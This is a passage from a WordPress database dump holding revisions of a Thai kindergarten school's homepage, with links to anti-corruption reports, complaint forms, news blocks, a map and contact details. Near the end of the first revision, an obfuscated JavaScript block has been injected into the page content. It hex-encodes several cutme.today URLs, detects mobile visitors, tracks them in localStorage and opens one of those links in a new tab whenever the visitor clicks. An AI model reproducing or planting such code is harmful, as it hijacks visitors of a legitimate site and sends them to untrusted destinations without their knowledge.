data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:30:08','2025-06-27 08:30:08','',19,'http://watprato.ssk.in.th/?p=577',0,'revision','',0),
(578,1,'2025-06-27 15:30:53','2025-06-27 08:30:53','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 